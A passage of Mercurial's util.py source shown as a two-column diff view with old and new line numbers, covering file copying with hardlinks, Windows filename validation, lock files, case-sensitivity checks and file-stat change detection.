1873 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1872
1874
1873
1875
1874 def checksignature(func, depth=1):
1876 def checksignature(func, depth=1):
1875 '''wrap a function with code to check for calling errors'''
1877 '''wrap a function with code to check for calling errors'''
1876
1878
1877 def check(*args, **kwargs):
1879 def check(*args, **kwargs):
1878 try:
1880 try:
1879 return func(*args, **kwargs)
1881 return func(*args, **kwargs)
1880 except TypeError:
1882 except TypeError:
1881 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1883 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1882 raise error.SignatureError
1884 raise error.SignatureError
1883 raise
1885 raise
1884
1886
1885 return check
1887 return check
1886
1888
1887
1889
1888 # a whilelist of known filesystems where hardlink works reliably
1890 # a whilelist of known filesystems where hardlink works reliably
1889 _hardlinkfswhitelist = {
1891 _hardlinkfswhitelist = {
1890 b'apfs',
1892 b'apfs',
1891 b'btrfs',
1893 b'btrfs',
1892 b'ext2',
1894 b'ext2',
1893 b'ext3',
1895 b'ext3',
1894 b'ext4',
1896 b'ext4',
1895 b'hfs',
1897 b'hfs',
1896 b'jfs',
1898 b'jfs',
1897 b'NTFS',
1899 b'NTFS',
1898 b'reiserfs',
1900 b'reiserfs',
1899 b'tmpfs',
1901 b'tmpfs',
1900 b'ufs',
1902 b'ufs',
1901 b'xfs',
1903 b'xfs',
1902 b'zfs',
1904 b'zfs',
1903 }
1905 }
1904
1906
1905
1907
1906 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1908 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1907 """copy a file, preserving mode and optionally other stat info like
1909 """copy a file, preserving mode and optionally other stat info like
1908 atime/mtime
1910 atime/mtime
1909
1911
1910 checkambig argument is used with filestat, and is useful only if
1912 checkambig argument is used with filestat, and is useful only if
1911 destination file is guarded by any lock (e.g. repo.lock or
1913 destination file is guarded by any lock (e.g. repo.lock or
1912 repo.wlock).
1914 repo.wlock).
1913
1915
1914 copystat and checkambig should be exclusive.
1916 copystat and checkambig should be exclusive.
1915 """
1917 """
1916 assert not (copystat and checkambig)
1918 assert not (copystat and checkambig)
1917 oldstat = None
1919 oldstat = None
1918 if os.path.lexists(dest):
1920 if os.path.lexists(dest):
1919 if checkambig:
1921 if checkambig:
1920 oldstat = checkambig and filestat.frompath(dest)
1922 oldstat = checkambig and filestat.frompath(dest)
1921 unlink(dest)
1923 unlink(dest)
1922 if hardlink:
1924 if hardlink:
1923 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1925 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1924 # unless we are confident that dest is on a whitelisted filesystem.
1926 # unless we are confident that dest is on a whitelisted filesystem.
1925 try:
1927 try:
1926 fstype = getfstype(os.path.dirname(dest))
1928 fstype = getfstype(os.path.dirname(dest))
1927 except OSError:
1929 except OSError:
1928 fstype = None
1930 fstype = None
1929 if fstype not in _hardlinkfswhitelist:
1931 if fstype not in _hardlinkfswhitelist:
1930 hardlink = False
1932 hardlink = False
1931 if hardlink:
1933 if hardlink:
1932 try:
1934 try:
1933 oslink(src, dest)
1935 oslink(src, dest)
1934 return
1936 return
1935 except (IOError, OSError):
1937 except (IOError, OSError):
1936 pass # fall back to normal copy
1938 pass # fall back to normal copy
1937 if os.path.islink(src):
1939 if os.path.islink(src):
1938 os.symlink(os.readlink(src), dest)
1940 os.symlink(os.readlink(src), dest)
1939 # copytime is ignored for symlinks, but in general copytime isn't needed
1941 # copytime is ignored for symlinks, but in general copytime isn't needed
1940 # for them anyway
1942 # for them anyway
1941 else:
1943 else:
1942 try:
1944 try:
1943 shutil.copyfile(src, dest)
1945 shutil.copyfile(src, dest)
1944 if copystat:
1946 if copystat:
1945 # copystat also copies mode
1947 # copystat also copies mode
1946 shutil.copystat(src, dest)
1948 shutil.copystat(src, dest)
1947 else:
1949 else:
1948 shutil.copymode(src, dest)
1950 shutil.copymode(src, dest)
1949 if oldstat and oldstat.stat:
1951 if oldstat and oldstat.stat:
1950 newstat = filestat.frompath(dest)
1952 newstat = filestat.frompath(dest)
1951 if newstat.isambig(oldstat):
1953 if newstat.isambig(oldstat):
1952 # stat of copied file is ambiguous to original one
1954 # stat of copied file is ambiguous to original one
1953 advanced = (
1955 advanced = (
1954 oldstat.stat[stat.ST_MTIME] + 1
1956 oldstat.stat[stat.ST_MTIME] + 1
1955 ) & 0x7FFFFFFF
1957 ) & 0x7FFFFFFF
1956 os.utime(dest, (advanced, advanced))
1958 os.utime(dest, (advanced, advanced))
1957 except shutil.Error as inst:
1959 except shutil.Error as inst:
1958 raise error.Abort(stringutil.forcebytestr(inst))
1960 raise error.Abort(stringutil.forcebytestr(inst))
1959
1961
1960
1962
1961 def copyfiles(src, dst, hardlink=None, progress=None):
1963 def copyfiles(src, dst, hardlink=None, progress=None):
1962 """Copy a directory tree using hardlinks if possible."""
1964 """Copy a directory tree using hardlinks if possible."""
1963 num = 0
1965 num = 0
1964
1966
1965 def settopic():
1967 def settopic():
1966 if progress:
1968 if progress:
1967 progress.topic = _(b'linking') if hardlink else _(b'copying')
1969 progress.topic = _(b'linking') if hardlink else _(b'copying')
1968
1970
1969 if os.path.isdir(src):
1971 if os.path.isdir(src):
1970 if hardlink is None:
1972 if hardlink is None:
1971 hardlink = (
1973 hardlink = (
1972 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1974 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1973 )
1975 )
1974 settopic()
1976 settopic()
1975 os.mkdir(dst)
1977 os.mkdir(dst)
1976 for name, kind in listdir(src):
1978 for name, kind in listdir(src):
1977 srcname = os.path.join(src, name)
1979 srcname = os.path.join(src, name)
1978 dstname = os.path.join(dst, name)
1980 dstname = os.path.join(dst, name)
1979 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1981 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1980 num += n
1982 num += n
1981 else:
1983 else:
1982 if hardlink is None:
1984 if hardlink is None:
1983 hardlink = (
1985 hardlink = (
1984 os.stat(os.path.dirname(src)).st_dev
1986 os.stat(os.path.dirname(src)).st_dev
1985 == os.stat(os.path.dirname(dst)).st_dev
1987 == os.stat(os.path.dirname(dst)).st_dev
1986 )
1988 )
1987 settopic()
1989 settopic()
1988
1990
1989 if hardlink:
1991 if hardlink:
1990 try:
1992 try:
1991 oslink(src, dst)
1993 oslink(src, dst)
1992 except (IOError, OSError):
1994 except (IOError, OSError):
1993 hardlink = False
1995 hardlink = False
1994 shutil.copy(src, dst)
1996 shutil.copy(src, dst)
1995 else:
1997 else:
1996 shutil.copy(src, dst)
1998 shutil.copy(src, dst)
1997 num += 1
1999 num += 1
1998 if progress:
2000 if progress:
1999 progress.increment()
2001 progress.increment()
2000
2002
2001 return hardlink, num
2003 return hardlink, num
2002
2004
2003
2005
2004 _winreservednames = {
2006 _winreservednames = {
2005 b'con',
2007 b'con',
2006 b'prn',
2008 b'prn',
2007 b'aux',
2009 b'aux',
2008 b'nul',
2010 b'nul',
2009 b'com1',
2011 b'com1',
2010 b'com2',
2012 b'com2',
2011 b'com3',
2013 b'com3',
2012 b'com4',
2014 b'com4',
2013 b'com5',
2015 b'com5',
2014 b'com6',
2016 b'com6',
2015 b'com7',
2017 b'com7',
2016 b'com8',
2018 b'com8',
2017 b'com9',
2019 b'com9',
2018 b'lpt1',
2020 b'lpt1',
2019 b'lpt2',
2021 b'lpt2',
2020 b'lpt3',
2022 b'lpt3',
2021 b'lpt4',
2023 b'lpt4',
2022 b'lpt5',
2024 b'lpt5',
2023 b'lpt6',
2025 b'lpt6',
2024 b'lpt7',
2026 b'lpt7',
2025 b'lpt8',
2027 b'lpt8',
2026 b'lpt9',
2028 b'lpt9',
2027 }
2029 }
2028 _winreservedchars = b':*?"<>|'
2030 _winreservedchars = b':*?"<>|'
2029
2031
2030
2032
2031 def checkwinfilename(path):
2033 def checkwinfilename(path):
2032 # type: (bytes) -> Optional[bytes]
2034 # type: (bytes) -> Optional[bytes]
2033 r"""Check that the base-relative path is a valid filename on Windows.
2035 r"""Check that the base-relative path is a valid filename on Windows.
2034 Returns None if the path is ok, or a UI string describing the problem.
2036 Returns None if the path is ok, or a UI string describing the problem.
2035
2037
2036 >>> checkwinfilename(b"just/a/normal/path")
2038 >>> checkwinfilename(b"just/a/normal/path")
2037 >>> checkwinfilename(b"foo/bar/con.xml")
2039 >>> checkwinfilename(b"foo/bar/con.xml")
2038 "filename contains 'con', which is reserved on Windows"
2040 "filename contains 'con', which is reserved on Windows"
2039 >>> checkwinfilename(b"foo/con.xml/bar")
2041 >>> checkwinfilename(b"foo/con.xml/bar")
2040 "filename contains 'con', which is reserved on Windows"
2042 "filename contains 'con', which is reserved on Windows"
2041 >>> checkwinfilename(b"foo/bar/xml.con")
2043 >>> checkwinfilename(b"foo/bar/xml.con")
2042 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2044 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2043 "filename contains 'AUX', which is reserved on Windows"
2045 "filename contains 'AUX', which is reserved on Windows"
2044 >>> checkwinfilename(b"foo/bar/bla:.txt")
2046 >>> checkwinfilename(b"foo/bar/bla:.txt")
2045 "filename contains ':', which is reserved on Windows"
2047 "filename contains ':', which is reserved on Windows"
2046 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2048 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2047 "filename contains '\\x07', which is invalid on Windows"
2049 "filename contains '\\x07', which is invalid on Windows"
2048 >>> checkwinfilename(b"foo/bar/bla ")
2050 >>> checkwinfilename(b"foo/bar/bla ")
2049 "filename ends with ' ', which is not allowed on Windows"
2051 "filename ends with ' ', which is not allowed on Windows"
2050 >>> checkwinfilename(b"../bar")
2052 >>> checkwinfilename(b"../bar")
2051 >>> checkwinfilename(b"foo\\")
2053 >>> checkwinfilename(b"foo\\")
2052 "filename ends with '\\', which is invalid on Windows"
2054 "filename ends with '\\', which is invalid on Windows"
2053 >>> checkwinfilename(b"foo\\/bar")
2055 >>> checkwinfilename(b"foo\\/bar")
2054 "directory name ends with '\\', which is invalid on Windows"
2056 "directory name ends with '\\', which is invalid on Windows"
2055 """
2057 """
2056 if path.endswith(b'\\'):
2058 if path.endswith(b'\\'):
2057 return _(b"filename ends with '\\', which is invalid on Windows")
2059 return _(b"filename ends with '\\', which is invalid on Windows")
2058 if b'\\/' in path:
2060 if b'\\/' in path:
2059 return _(b"directory name ends with '\\', which is invalid on Windows")
2061 return _(b"directory name ends with '\\', which is invalid on Windows")
2060 for n in path.replace(b'\\', b'/').split(b'/'):
2062 for n in path.replace(b'\\', b'/').split(b'/'):
2061 if not n:
2063 if not n:
2062 continue
2064 continue
2063 for c in _filenamebytestr(n):
2065 for c in _filenamebytestr(n):
2064 if c in _winreservedchars:
2066 if c in _winreservedchars:
2065 return (
2067 return (
2066 _(
2068 _(
2067 b"filename contains '%s', which is reserved "
2069 b"filename contains '%s', which is reserved "
2068 b"on Windows"
2070 b"on Windows"
2069 )
2071 )
2070 % c
2072 % c
2071 )
2073 )
2072 if ord(c) <= 31:
2074 if ord(c) <= 31:
2073 return _(
2075 return _(
2074 b"filename contains '%s', which is invalid on Windows"
2076 b"filename contains '%s', which is invalid on Windows"
2075 ) % stringutil.escapestr(c)
2077 ) % stringutil.escapestr(c)
2076 base = n.split(b'.')[0]
2078 base = n.split(b'.')[0]
2077 if base and base.lower() in _winreservednames:
2079 if base and base.lower() in _winreservednames:
2078 return (
2080 return (
2079 _(b"filename contains '%s', which is reserved on Windows")
2081 _(b"filename contains '%s', which is reserved on Windows")
2080 % base
2082 % base
2081 )
2083 )
2082 t = n[-1:]
2084 t = n[-1:]
2083 if t in b'. ' and n not in b'..':
2085 if t in b'. ' and n not in b'..':
2084 return (
2086 return (
2085 _(
2087 _(
2086 b"filename ends with '%s', which is not allowed "
2088 b"filename ends with '%s', which is not allowed "
2087 b"on Windows"
2089 b"on Windows"
2088 )
2090 )
2089 % t
2091 % t
2090 )
2092 )
2091
2093
2092
2094
2093 timer = getattr(time, "perf_counter", None)
2095 timer = getattr(time, "perf_counter", None)
2094
2096
2095 if pycompat.iswindows:
2097 if pycompat.iswindows:
2096 checkosfilename = checkwinfilename
2098 checkosfilename = checkwinfilename
2097 if not timer:
2099 if not timer:
2098 timer = time.clock
2100 timer = time.clock
2099 else:
2101 else:
2100 # mercurial.windows doesn't have platform.checkosfilename
2102 # mercurial.windows doesn't have platform.checkosfilename
2101 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2103 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2102 if not timer:
2104 if not timer:
2103 timer = time.time
2105 timer = time.time
2104
2106
2105
2107
2106 def makelock(info, pathname):
2108 def makelock(info, pathname):
2107 """Create a lock file atomically if possible
2109 """Create a lock file atomically if possible
2108
2110
2109 This may leave a stale lock file if symlink isn't supported and signal
2111 This may leave a stale lock file if symlink isn't supported and signal
2110 interrupt is enabled.
2112 interrupt is enabled.
2111 """
2113 """
2112 try:
2114 try:
2113 return os.symlink(info, pathname)
2115 return os.symlink(info, pathname)
2114 except OSError as why:
2116 except OSError as why:
2115 if why.errno == errno.EEXIST:
2117 if why.errno == errno.EEXIST:
2116 raise
2118 raise
2117 except AttributeError: # no symlink in os
2119 except AttributeError: # no symlink in os
2118 pass
2120 pass
2119
2121
2120 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2122 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2121 ld = os.open(pathname, flags)
2123 ld = os.open(pathname, flags)
2122 os.write(ld, info)
2124 os.write(ld, info)
2123 os.close(ld)
2125 os.close(ld)
2124
2126
2125
2127
2126 def readlock(pathname):
2128 def readlock(pathname):
2127 # type: (bytes) -> bytes
2129 # type: (bytes) -> bytes
2128 try:
2130 try:
2129 return readlink(pathname)
2131 return readlink(pathname)
2130 except OSError as why:
2132 except OSError as why:
2131 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2133 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2132 raise
2134 raise
2133 except AttributeError: # no symlink in os
2135 except AttributeError: # no symlink in os
2134 pass
2136 pass
2135 with posixfile(pathname, b'rb') as fp:
2137 with posixfile(pathname, b'rb') as fp:
2136 return fp.read()
2138 return fp.read()
2137
2139
2138
2140
2139 def fstat(fp):
2141 def fstat(fp):
2140 '''stat file object that may not have fileno method.'''
2142 '''stat file object that may not have fileno method.'''
2141 try:
2143 try:
2142 return os.fstat(fp.fileno())
2144 return os.fstat(fp.fileno())
2143 except AttributeError:
2145 except AttributeError:
2144 return os.stat(fp.name)
2146 return os.stat(fp.name)
2145
2147
2146
2148
2147 # File system features
2149 # File system features
2148
2150
2149
2151
2150 def fscasesensitive(path):
2152 def fscasesensitive(path):
2151 # type: (bytes) -> bool
2153 # type: (bytes) -> bool
2152 """
2154 """
2153 Return true if the given path is on a case-sensitive filesystem
2155 Return true if the given path is on a case-sensitive filesystem
2154
2156
2155 Requires a path (like /foo/.hg) ending with a foldable final
2157 Requires a path (like /foo/.hg) ending with a foldable final
2156 directory component.
2158 directory component.
2157 """
2159 """
2158 s1 = os.lstat(path)
2160 s1 = os.lstat(path)
2159 d, b = os.path.split(path)
2161 d, b = os.path.split(path)
2160 b2 = b.upper()
2162 b2 = b.upper()
2161 if b == b2:
2163 if b == b2:
2162 b2 = b.lower()
2164 b2 = b.lower()
2163 if b == b2:
2165 if b == b2:
2164 return True # no evidence against case sensitivity
2166 return True # no evidence against case sensitivity
2165 p2 = os.path.join(d, b2)
2167 p2 = os.path.join(d, b2)
2166 try:
2168 try:
2167 s2 = os.lstat(p2)
2169 s2 = os.lstat(p2)
2168 if s2 == s1:
2170 if s2 == s1:
2169 return False
2171 return False
2170 return True
2172 return True
2171 except OSError:
2173 except OSError:
2172 return True
2174 return True
2173
2175
2174
2176
2175 try:
2177 try:
2176 import re2 # pytype: disable=import-error
2178 import re2 # pytype: disable=import-error
2177
2179
2178 _re2 = None
2180 _re2 = None
2179 except ImportError:
2181 except ImportError:
2180 _re2 = False
2182 _re2 = False
2181
2183
2182
2184
2183 class _re(object):
2185 class _re(object):
2184 def _checkre2(self):
2186 def _checkre2(self):
2185 global _re2
2187 global _re2
2186 try:
2188 try:
2187 # check if match works, see issue3964
2189 # check if match works, see issue3964
2188 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2190 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2189 except ImportError:
2191 except ImportError:
2190 _re2 = False
2192 _re2 = False
2191
2193
2192 def compile(self, pat, flags=0):
2194 def compile(self, pat, flags=0):
2193 """Compile a regular expression, using re2 if possible
2195 """Compile a regular expression, using re2 if possible
2194
2196
2195 For best performance, use only re2-compatible regexp features. The
2197 For best performance, use only re2-compatible regexp features. The
2196 only flags from the re module that are re2-compatible are
2198 only flags from the re module that are re2-compatible are
2197 IGNORECASE and MULTILINE."""
2199 IGNORECASE and MULTILINE."""
2198 if _re2 is None:
2200 if _re2 is None:
2199 self._checkre2()
2201 self._checkre2()
2200 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2202 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2201 if flags & remod.IGNORECASE:
2203 if flags & remod.IGNORECASE:
2202 pat = b'(?i)' + pat
2204 pat = b'(?i)' + pat
2203 if flags & remod.MULTILINE:
2205 if flags & remod.MULTILINE:
2204 pat = b'(?m)' + pat
2206 pat = b'(?m)' + pat
2205 try:
2207 try:
2206 return re2.compile(pat)
2208 return re2.compile(pat)
2207 except re2.error:
2209 except re2.error:
2208 pass
2210 pass
2209 return remod.compile(pat, flags)
2211 return remod.compile(pat, flags)
2210
2212
2211 @propertycache
2213 @propertycache
2212 def escape(self):
2214 def escape(self):
2213 """Return the version of escape corresponding to self.compile.
2215 """Return the version of escape corresponding to self.compile.
2214
2216
2215 This is imperfect because whether re2 or re is used for a particular
2217 This is imperfect because whether re2 or re is used for a particular
2216 function depends on the flags, etc, but it's the best we can do.
2218 function depends on the flags, etc, but it's the best we can do.
2217 """
2219 """
2218 global _re2
2220 global _re2
2219 if _re2 is None:
2221 if _re2 is None:
2220 self._checkre2()
2222 self._checkre2()
2221 if _re2:
2223 if _re2:
2222 return re2.escape
2224 return re2.escape
2223 else:
2225 else:
2224 return remod.escape
2226 return remod.escape
2225
2227
2226
2228
2227 re = _re()
2229 re = _re()
2228
2230
2229 _fspathcache = {}
2231 _fspathcache = {}
2230
2232
2231
2233
2232 def fspath(name, root):
2234 def fspath(name, root):
2233 # type: (bytes, bytes) -> bytes
2235 # type: (bytes, bytes) -> bytes
2234 """Get name in the case stored in the filesystem
2236 """Get name in the case stored in the filesystem
2235
2237
2236 The name should be relative to root, and be normcase-ed for efficiency.
2238 The name should be relative to root, and be normcase-ed for efficiency.
2237
2239
2238 Note that this function is unnecessary, and should not be
2240 Note that this function is unnecessary, and should not be
2239 called, for case-sensitive filesystems (simply because it's expensive).
2241 called, for case-sensitive filesystems (simply because it's expensive).
2240
2242
2241 The root should be normcase-ed, too.
2243 The root should be normcase-ed, too.
2242 """
2244 """
2243
2245
2244 def _makefspathcacheentry(dir):
2246 def _makefspathcacheentry(dir):
2245 return {normcase(n): n for n in os.listdir(dir)}
2247 return {normcase(n): n for n in os.listdir(dir)}
2246
2248
2247 seps = pycompat.ossep
2249 seps = pycompat.ossep
2248 if pycompat.osaltsep:
2250 if pycompat.osaltsep:
2249 seps = seps + pycompat.osaltsep
2251 seps = seps + pycompat.osaltsep
2250 # Protect backslashes. This gets silly very quickly.
2252 # Protect backslashes. This gets silly very quickly.
2251 seps.replace(b'\\', b'\\\\')
2253 seps.replace(b'\\', b'\\\\')
2252 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2254 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2253 dir = os.path.normpath(root)
2255 dir = os.path.normpath(root)
2254 result = []
2256 result = []
2255 for part, sep in pattern.findall(name):
2257 for part, sep in pattern.findall(name):
2256 if sep:
2258 if sep:
2257 result.append(sep)
2259 result.append(sep)
2258 continue
2260 continue
2259
2261
2260 if dir not in _fspathcache:
2262 if dir not in _fspathcache:
2261 _fspathcache[dir] = _makefspathcacheentry(dir)
2263 _fspathcache[dir] = _makefspathcacheentry(dir)
2262 contents = _fspathcache[dir]
2264 contents = _fspathcache[dir]
2263
2265
2264 found = contents.get(part)
2266 found = contents.get(part)
2265 if not found:
2267 if not found:
2266 # retry "once per directory" per "dirstate.walk" which
2268 # retry "once per directory" per "dirstate.walk" which
2267 # may take place for each patches of "hg qpush", for example
2269 # may take place for each patches of "hg qpush", for example
2268 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2270 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2269 found = contents.get(part)
2271 found = contents.get(part)
2270
2272
2271 result.append(found or part)
2273 result.append(found or part)
2272 dir = os.path.join(dir, part)
2274 dir = os.path.join(dir, part)
2273
2275
2274 return b''.join(result)
2276 return b''.join(result)
2275
2277
2276
2278
2277 def checknlink(testfile):
2279 def checknlink(testfile):
2278 # type: (bytes) -> bool
2280 # type: (bytes) -> bool
2279 '''check whether hardlink count reporting works properly'''
2281 '''check whether hardlink count reporting works properly'''
2280
2282
2281 # testfile may be open, so we need a separate file for checking to
2283 # testfile may be open, so we need a separate file for checking to
2282 # work around issue2543 (or testfile may get lost on Samba shares)
2284 # work around issue2543 (or testfile may get lost on Samba shares)
2283 f1, f2, fp = None, None, None
2285 f1, f2, fp = None, None, None
2284 try:
2286 try:
2285 fd, f1 = pycompat.mkstemp(
2287 fd, f1 = pycompat.mkstemp(
2286 prefix=b'.%s-' % os.path.basename(testfile),
2288 prefix=b'.%s-' % os.path.basename(testfile),
2287 suffix=b'1~',
2289 suffix=b'1~',
2288 dir=os.path.dirname(testfile),
2290 dir=os.path.dirname(testfile),
2289 )
2291 )
2290 os.close(fd)
2292 os.close(fd)
2291 f2 = b'%s2~' % f1[:-2]
2293 f2 = b'%s2~' % f1[:-2]
2292
2294
2293 oslink(f1, f2)
2295 oslink(f1, f2)
2294 # nlinks() may behave differently for files on Windows shares if
2296 # nlinks() may behave differently for files on Windows shares if
2295 # the file is open.
2297 # the file is open.
2296 fp = posixfile(f2)
2298 fp = posixfile(f2)
2297 return nlinks(f2) > 1
2299 return nlinks(f2) > 1
2298 except OSError:
2300 except OSError:
2299 return False
2301 return False
2300 finally:
2302 finally:
2301 if fp is not None:
2303 if fp is not None:
2302 fp.close()
2304 fp.close()
2303 for f in (f1, f2):
2305 for f in (f1, f2):
2304 try:
2306 try:
2305 if f is not None:
2307 if f is not None:
2306 os.unlink(f)
2308 os.unlink(f)
2307 except OSError:
2309 except OSError:
2308 pass
2310 pass
2309
2311
2310
2312
2311 def endswithsep(path):
2313 def endswithsep(path):
2312 # type: (bytes) -> bool
2314 # type: (bytes) -> bool
2313 '''Check path ends with os.sep or os.altsep.'''
2315 '''Check path ends with os.sep or os.altsep.'''
2314 return bool( # help pytype
2316 return bool( # help pytype
2315 path.endswith(pycompat.ossep)
2317 path.endswith(pycompat.ossep)
2316 or pycompat.osaltsep
2318 or pycompat.osaltsep
2317 and path.endswith(pycompat.osaltsep)
2319 and path.endswith(pycompat.osaltsep)
2318 )
2320 )
2319
2321
2320
2322
2321 def splitpath(path):
2323 def splitpath(path):
2322 # type: (bytes) -> List[bytes]
2324 # type: (bytes) -> List[bytes]
2323 """Split path by os.sep.
2325 """Split path by os.sep.
2324 Note that this function does not use os.altsep because this is
2326 Note that this function does not use os.altsep because this is
2325 an alternative of simple "xxx.split(os.sep)".
2327 an alternative of simple "xxx.split(os.sep)".
2326 It is recommended to use os.path.normpath() before using this
2328 It is recommended to use os.path.normpath() before using this
2327 function if need."""
2329 function if need."""
2328 return path.split(pycompat.ossep)
2330 return path.split(pycompat.ossep)
2329
2331
2330
2332
2331 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2333 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2332 """Create a temporary file with the same contents from name
2334 """Create a temporary file with the same contents from name
2333
2335
2334 The permission bits are copied from the original file.
2336 The permission bits are copied from the original file.
2335
2337
2336 If the temporary file is going to be truncated immediately, you
2338 If the temporary file is going to be truncated immediately, you
2337 can use emptyok=True as an optimization.
2339 can use emptyok=True as an optimization.
2338
2340
2339 Returns the name of the temporary file.
2341 Returns the name of the temporary file.
2340 """
2342 """
2341 d, fn = os.path.split(name)
2343 d, fn = os.path.split(name)
2342 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2344 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2343 os.close(fd)
2345 os.close(fd)
2344 # Temporary files are created with mode 0600, which is usually not
2346 # Temporary files are created with mode 0600, which is usually not
2345 # what we want. If the original file already exists, just copy
2347 # what we want. If the original file already exists, just copy
2346 # its mode. Otherwise, manually obey umask.
2348 # its mode. Otherwise, manually obey umask.
2347 copymode(name, temp, createmode, enforcewritable)
2349 copymode(name, temp, createmode, enforcewritable)
2348
2350
2349 if emptyok:
2351 if emptyok:
2350 return temp
2352 return temp
2351 try:
2353 try:
2352 try:
2354 try:
2353 ifp = posixfile(name, b"rb")
2355 ifp = posixfile(name, b"rb")
2354 except IOError as inst:
2356 except IOError as inst:
2355 if inst.errno == errno.ENOENT:
2357 if inst.errno == errno.ENOENT:
2356 return temp
2358 return temp
2357 if not getattr(inst, 'filename', None):
2359 if not getattr(inst, 'filename', None):
2358 inst.filename = name
2360 inst.filename = name
2359 raise
2361 raise
2360 ofp = posixfile(temp, b"wb")
2362 ofp = posixfile(temp, b"wb")
2361 for chunk in filechunkiter(ifp):
2363 for chunk in filechunkiter(ifp):
2362 ofp.write(chunk)
2364 ofp.write(chunk)
2363 ifp.close()
2365 ifp.close()
2364 ofp.close()
2366 ofp.close()
2365 except: # re-raises
2367 except: # re-raises
2366 try:
2368 try:
2367 os.unlink(temp)
2369 os.unlink(temp)
2368 except OSError:
2370 except OSError:
2369 pass
2371 pass
2370 raise
2372 raise
2371 return temp
2373 return temp
2372
2374
2373
2375
2374 class filestat(object):
2376 class filestat(object):
2375 """help to exactly detect change of a file
2377 """help to exactly detect change of a file
2376
2378
2377 'stat' attribute is result of 'os.stat()' if specified 'path'
2379 'stat' attribute is result of 'os.stat()' if specified 'path'
2378 exists. Otherwise, it is None. This can avoid preparative
2380 exists. Otherwise, it is None. This can avoid preparative
2379 'exists()' examination on client side of this class.
2381 'exists()' examination on client side of this class.
2380 """
2382 """
2381
2383
2382 def __init__(self, stat):
2384 def __init__(self, stat):
2383 self.stat = stat
2385 self.stat = stat
2384
2386
2385 @classmethod
2387 @classmethod
2386 def frompath(cls, path):
2388 def frompath(cls, path):
2387 try:
2389 try:
2388 stat = os.stat(path)
2390 stat = os.stat(path)
2389 except OSError as err:
2391 except OSError as err:
2390 if err.errno != errno.ENOENT:
2392 if err.errno != errno.ENOENT:
2391 raise
2393 raise
2392 stat = None
2394 stat = None
2393 return cls(stat)
2395 return cls(stat)
2394
2396
2395 @classmethod
2397 @classmethod
2396 def fromfp(cls, fp):
2398 def fromfp(cls, fp):
2397 stat = os.fstat(fp.fileno())
2399 stat = os.fstat(fp.fileno())
2398 return cls(stat)
2400 return cls(stat)
2399
2401
2400 __hash__ = object.__hash__
2402 __hash__ = object.__hash__
2401
2403
2402 def __eq__(self, old):
2404 def __eq__(self, old):
2403 try:
2405 try:
2404 # if ambiguity between stat of new and old file is
2406 # if ambiguity between stat of new and old file is
2405 # avoided, comparison of size, ctime and mtime is enough
2407 # avoided, comparison of size, ctime and mtime is enough
2406 # to exactly detect change of a file regardless of platform
2408 # to exactly detect change of a file regardless of platform
2407 return (
2409 return (
2408 self.stat.st_size == old.stat.st_size
2410 self.stat.st_size == old.stat.st_size
2409 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2411 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2410 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2412 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2411 )
2413 )
2412 except AttributeError:
2414 except AttributeError:
2413 pass
2415 pass
2414 try:
2416 try:
2415 return self.stat is None and old.stat is None
2417 return self.stat is None and old.stat is None
2416 except AttributeError:
2418 except AttributeError:
2417 return False
2419 return False
2418
2420
2419 def isambig(self, old):
2421 def isambig(self, old):
2420 """Examine whether new (= self) stat is ambiguous against old one
2422 """Examine whether new (= self) stat is ambiguous against old one
2421
2423
2422 "S[N]" below means stat of a file at N-th change:
2424 "S[N]" below means stat of a file at N-th change:
2423
2425
2424 - S[n-1].ctime < S[n].ctime: can detect change of a file
2426 - S[n-1].ctime < S[n].ctime: can detect change of a file
2425 - S[n-1].ctime == S[n].ctime
2427 - S[n-1].ctime == S[n].ctime
2426 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2428 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2427 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2429 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2428 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2430 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2429 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2431 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2430
2432
2431 Case (*2) above means that a file was changed twice or more at
2433 Case (*2) above means that a file was changed twice or more at
